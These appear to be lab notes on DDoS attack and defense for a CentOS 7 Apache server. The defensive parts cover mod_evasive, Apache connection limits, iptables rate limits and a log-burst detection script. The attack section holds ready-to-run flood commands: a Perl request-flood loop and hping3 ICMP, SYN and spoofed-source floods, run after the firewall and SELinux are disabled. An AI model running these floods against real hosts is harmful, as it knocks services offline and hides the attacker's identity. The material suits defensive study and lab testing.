CentOS 7 DDoS attack and defense


Apache version

vim /etc/httpd/conf/httpd.conf
	> # ServerSignature Off
# Limit the number of simultaneous connections (DDoS mitigation)
MaxRequestWorkers 500
# Limit the number of requests per user (per keep-alive connection)
MaxKeepAliveRequests 500
# Drop the session after 5 minutes without activity
TimeOut 300

DDoS-blocking module
yum -y install epel-release
yum -y install mod_evasive

vim /etc/httpd/conf.d/mod_evasive.conf

systemctl restart httpd

DDoS attack
systemctl stop firewalld
setenforce 0

yum -y install epel-release
yum -y install mod_evasive

vim /usr/share/doc/mod_evasive-1.10.1/test.pl # edit the perl file

use IO::Socket;

for(0..100) {
  my($response);
  my($SOCKET) = new IO::Socket::INET( Proto   => "tcp",
                                      PeerAddr=> "192.168.111.100:80");
  if (! defined $SOCKET) { die $!; }
  print $SOCKET "GET /?$_ HTTP/1.0\r\nHost:127.0.0.1\r\n\r\n";
  $response = <$SOCKET>;   # first line of the reply (the status line)
  print $response;
  close($SOCKET);
}

perl /usr/share/doc/mod_evasive-1.10.1/test.pl # run the perl script

DDoS (denial-of-service attack)

# -1 : ICMP mode, -2 : UDP mode
hping3 -1 -c 5 192.168.111.100
hping3 --scan 1-1024 -S 192.168.111.100

# rand attack (hides the source so that nobody can tell who attacked)
hping3 -1 -a 10.20.30.40 -d 65000 192.168.111.100
# -a : source IP address, -d : data size

# flooding attack
hping3 -S -d 64 192.168.111.100 -p 80 --flood --rand-source
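
Blocking DDoS
iptables -I INPUT 1 -p tcp --dport 80 -m state --state NEW -m recent --set   # track each new source
iptables -I INPUT 2 -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 1 --hitcount 10 -j DROP   # drop on the 10th hit within 1 s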
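
To check from the server side whether a client really reaches the rule's threshold of 10 hits on port 80 within one second, the access log can be bucketed per client and per second. The script below is an added example, not part of the original post: the function names, client addresses and log lines are constructed, and it assumes Apache's combined log format and that blocked clients receive 403 (the status mod_evasive returns).

```shell
#!/bin/sh
# Added example (not from the original post).
# flag_bursts THRESHOLD < access_log
# Prints "ip second requests forbidden" for every (client, second) bucket
# whose request count is >= THRESHOLD.
flag_bursts() {
  awk -v limit="$1" '
    {
      ip  = $1
      sec = substr($4, 2)            # "[01/Jan/2024:10:00:00" -> drop the "["
      key = ip " " sec
      total[key]++
      if ($9 == 403) denied[key]++   # 403 = request refused (e.g. by mod_evasive)
    }
    END {
      for (k in total)
        if (total[k] >= limit) print k, total[k], denied[k] + 0
    }' | sort
}

# Constructed sample input, not real traffic.
sample_log() {
  # 12 test.pl-style requests from one client inside the same second;
  # the last two are answered with 403.
  i=0
  while [ "$i" -lt 12 ]; do
    if [ "$i" -lt 10 ]; then st=200; else st=403; fi
    printf '192.168.111.50 - - [01/Jan/2024:10:00:00 +0900] "GET /?%d HTTP/1.0" %s 45\n' "$i" "$st"
    i=$((i + 1))
  done
  # An ordinary client: 3 requests spread over 3 seconds.
  for s in 01 02 03; do
    printf '192.168.111.60 - - [01/Jan/2024:10:00:%s +0900] "GET /index.html HTTP/1.1" 200 512\n' "$s"
  done
}

# Same threshold as --hitcount 10 / --seconds 1 in the iptables rule.
sample_log | flag_bursts 10
```

Against a live server, feed the real log instead: flag_bursts 10 < /var/log/httpd/access_log. Spoofed-source floods such as --rand-source never complete a request, so they do not appear in this log.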